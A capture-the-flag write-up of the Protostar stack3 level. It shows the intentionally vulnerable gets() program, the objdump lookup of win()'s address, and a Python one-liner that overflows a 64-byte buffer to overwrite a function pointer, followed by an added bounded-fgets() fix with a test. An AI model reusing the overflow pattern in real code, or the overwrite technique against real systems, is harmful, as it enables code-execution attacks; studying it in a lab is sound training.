Encapsulating

Protostar – stack3

This one looks interesting, calling a variable as a function. We need to find out where the win() function is in memory and shit. Let’s do this:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();   /* function pointer declared next to the buffer */
  char buffer[64];

  fp = 0;

  gets(buffer);           /* no bounds check: input past 64 bytes overwrites fp */

  if(fp) {
    printf("calling function pointer, jumping to 0x%08x\n", fp);
    fp();
  }
}

I will need objdump for this so we can get the memory address of the win() function:

user@protostar:/opt/protostar/bin$ objdump -S stack3 | grep "win"
08048424 <win>:
user@protostar:/opt/protostar/bin$ python -c 'print("A"*64 + "\x24\x84\x04\x08")' | ./stack3 
calling function pointer, jumping to 0x08048424
code flow successfully changed

Ridiculous.
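
The fix for the bug used above, as an added example (not part of the original post or the Protostar source): the same buffer-plus-function-pointer layout, read through a bounded fgets() wrapper instead of gets(). The names struct frame, read_line and fp_survives_post_input are made up for this sketch, and the input is rebuilt from the command shown in the post.

```c
#include <stdio.h>
#include <string.h>

/* stack3's two locals, placed in a struct so fp sits right after buffer. */
struct frame {
    char buffer[64];
    void (*fp)(void);
};

/* Bounded stand-in for gets(): stores at most size-1 bytes plus a NUL.
 * Returns 0 if the line fit, 1 if it was truncated, -1 on EOF or error. */
int read_line(FILE *in, char *buf, size_t size)
{
    int c, truncated = 0;
    size_t n;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    n = strcspn(buf, "\n");
    if (buf[n] == '\n') {          /* whole line fit: drop the newline */
        buf[n] = '\0';
        return 0;
    }
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;             /* discard whatever did not fit */
    return truncated;
}

/* Feeds the post's input through read_line(). Returns 1 if fp is still NULL
 * afterwards, 0 if it was overwritten, -1 if no temp file could be created. */
int fp_survives_post_input(void)
{
    struct frame f = { .fp = NULL };
    char input[69];
    int rc;
    FILE *in = tmpfile();          /* temp file stands in for stdin */
    if (in == NULL) return -1;
    memset(input, 'A', 64);                        /* 64 bytes of padding */
    memcpy(input + 64, "\x24\x84\x04\x08\n", 5);   /* 4 bytes from the post */
    fwrite(input, 1, sizeof input, in);
    rewind(in);
    rc = read_line(in, f.buffer, sizeof f.buffer);
    fclose(in);
    return (rc == 1 && f.fp == NULL && strlen(f.buffer) == 63) ? 1 : 0;
}

int main(void)
{
    printf("fp intact after long input: %d\n", fp_survives_post_input());
    return 0;
}
```

With the read bounded to sizeof buffer, the extra four bytes are dropped and the if(fp) branch in stack3 would never be taken.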
